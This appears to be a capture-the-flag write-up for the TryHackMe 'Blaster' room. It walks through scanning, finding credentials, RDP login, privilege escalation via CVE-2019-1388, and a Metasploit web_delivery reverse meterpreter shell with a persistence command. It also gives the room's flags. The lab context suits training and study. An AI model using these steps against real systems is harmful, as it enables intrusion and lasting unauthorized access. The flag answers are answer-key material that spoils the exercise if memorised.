Skip to content

Latest commit

 

History

History
128 lines (77 loc) · 3.58 KB

blaster.md

File metadata and controls

128 lines (77 loc) · 3.58 KB

A blast from the past!

Scanning

scan the target, add -Pn option when doing with windows

nmap -sS -Pn -sV -sC -T4 10.10.194.71

image

HTTP

view the webpage

image

it's default IIS windows server

Enumeration

enum the directories using gobuster

gobuster dir -u http://10.10.194.71 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40

i found a hidden directory call /retro

image

view the webpage, we have a blog

image

maybe the username is wade

image

and i found a comment in that post may related to the password

image

Exploitation

log into the machine using remmina

10.10.194.71
wade
parzival

image

inside, we have a user.txt

image

Flag user.txt
Answer THM{HACK_PLAYER_ONE}

Privilege Escalation

let's diving into the machine, find some research about hhupd.exe

image

it's CVE-2019-1388, run the program with administrator

image

click on show more detail and click show author certificate

image

click on the link and close the program, you will see a webpage in browser, now save the webpage

image

search for C:\Windows\System32\cmd.exe to open cmd

image

here you are, flag at Desktop of Admin account

image

Flag root.txt
Answer THM{COIN_OPERATED_EXPLOITATION}

Persistence access

now, we need to gain a remote shell access and persistence

msfconsole
use exploit/multi/script/web_delivery
options

image

set the options and target to PSH (powershell)

show targets
set target 2
set lhost 10.10.194.71
set lport 3389
set payload windows/meterpreter/reverse_http
run -j

image

Run the command on the compromised machine and a reverse shell will spawn in a new Metasploit session

run persistence -X

image